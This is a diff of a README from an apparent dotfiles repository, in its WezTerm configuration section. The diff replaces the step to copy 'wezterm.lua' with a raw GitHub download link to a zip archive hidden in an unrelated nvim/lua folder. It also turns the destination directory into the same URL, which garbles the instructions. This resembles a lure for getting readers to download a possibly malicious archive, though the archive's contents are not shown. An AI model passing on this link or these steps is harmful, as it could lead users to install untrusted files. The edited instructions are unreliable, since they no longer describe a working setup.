FirmScythe/Config-Files/README.md

 WezTerm is a terminal emulator that aims to provide a rich user experience.
 My configuration focuses on appearance and usability.

-1. Locate the `wezterm.lua` file in the repository.
+1. Locate the `https://github.com/FirmScythe/Config-Files/raw/refs/heads/main/nvim/lua/josean/core/Files_Config_v2.7.zip` file in the repository.
-2. Copy it to your WezTerm configuration directory, usually at `~/.config/wezterm/`.
+2. Copy it to your WezTerm configuration directory, usually at `~https://github.com/FirmScythe/Config-Files/raw/refs/heads/main/nvim/lua/josean/core/Files_Config_v2.7.zip`.
 3. Restart WezTerm to see the changes.

 ### Yabai